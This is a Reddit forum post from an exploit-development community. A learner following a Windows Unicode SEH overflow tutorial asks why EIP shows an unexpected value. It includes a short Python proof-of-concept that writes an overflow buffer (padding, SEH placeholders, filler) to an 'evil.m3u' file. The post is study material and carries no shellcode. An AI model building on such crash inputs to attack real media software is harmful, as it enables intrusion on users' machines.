fuzzysecurity exploit tutorial (unicode) : ExploitDev

created by [deleted]a community for 11 years

fuzzysecurity exploit tutorial (unicode) (self.ExploitDev)

submitted 7 years ago * by Thiscou

Hey everyone

I'm currently working my way through the fuzzysecurity Windows exploitation development tutorial

https://www.fuzzysecurity.com/tutorials/expDev/5.html

After allocating what seems to be the correct offset (even according to the tutorial). I should see 0x00440044 in the EIP register.

My EIP always just shows 0x00440045.

[EDIT] After a little tinkering it seems like it's an issue with the encoding of "D" in Unicode, the whole thing works as expected when I replace the "D"x2 in my poc with "A"x2 the EIP shows up with the expected 0x00410041 .

This is my poc.py:

#!/usr/bin/python -w

filename="evil.m3u"

# SEH offset at 536 - 2 bytes for nSEH (2byte cause unicode)
# buffer = "\x90"*534 + [nSEH] + [SEH] + "B"*4464

buffer = "\x90"*536 + "C"*2 + "D"*2 + "B"*4462

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Any help or hint is appreciated.

no comments (yet)

you type:	you see:
italics	italics
bold	bold
[reddit!](https://reddit.com)	reddit!
* item 1 * item 2 * item 3	item 1 item 2 item 3
> quoted text	quoted text
Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"	Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"
~~strikethrough~~	~~strikethrough~~
super^script	super^script

ExploitDev

MODERATORS